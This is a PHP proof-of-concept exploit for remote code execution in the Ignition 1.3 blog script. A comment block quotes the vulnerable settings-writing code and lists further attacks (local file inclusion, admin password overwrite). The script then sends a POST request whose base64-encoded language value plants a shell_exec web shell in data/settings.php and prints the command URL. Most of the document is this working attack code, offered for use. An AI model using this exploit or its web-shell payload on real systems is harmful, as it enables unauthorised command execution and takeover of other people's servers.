<?php
/*
Ignition 1.3 Remote Code Execution Exploit
by cOndemned
download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
source of i-options.php
1.<?php
2. session_start();3.if($_POST['submit']){4.if($FH = @fopen('data/settings.php','w')){5. @fwrite($FH,'<?php $pass = "'.$_POST['pass'].'";6. $uri ="'.$_POST['uri'].'";7. $suri ="'.$_POST['suri'].'";8. $blogtitle ="'.$_POST['title'].'";9. $description ="'.$_POST['description'].'";10. $postid ="'.$_POST['id'].'";11. $author ="'.$_POST['author'].'";12. $skin ="'.$_POST['skin'].'";13. $gravatar ="'.$_POST['gravatar'].'";14. $twitter ="' . $_POST['twitter'] . '";15. $identica ="' . $_POST['identica'] . '";16. $book ="' . $_POST['book'] . '";17. $game ="' . $_POST['game'] . '";18. $language ="' . $_POST['lang'] . '";19.20. require_once("template.php");21. require_once("lang/$language.php");');22.#fclose($FH);23.}
We can overwrite setting.php by simply sending specially crafted POST request,and put some evil code into one of the variables. After running my PoC line with
$language var will be:
$language ="en";echo @shell_exec($_GET['cmd']);$wtf="";
Where "en"is default language and without filling this field correctly admin
will see error while trying to access blog index.
other attacks scenarios:- attacker can use $_POST['language'] variable to exploit Local File
Inclusion (lines 18and21)- fill $_POST['pass']with new password (md5 hashed) to overwrite admins
password
- etc...*/
$target ='http://localhost/ignition/';
$post = array
('uri'=> $target,'suri'=> $target,'description'=>'Just another lame php blog script owned :<','skin'=>'default','lang'=> base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),'submit'=>1);
$sock = curl_init();
curl_setopt_array
(
$sock,
array
(
CURLOPT_URL =>"$target/i-options.php",
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post)));
curl_exec($sock);
curl_close($sock);
echo "Check: $target/data/settings.php?cmd=[system_command]";
?>
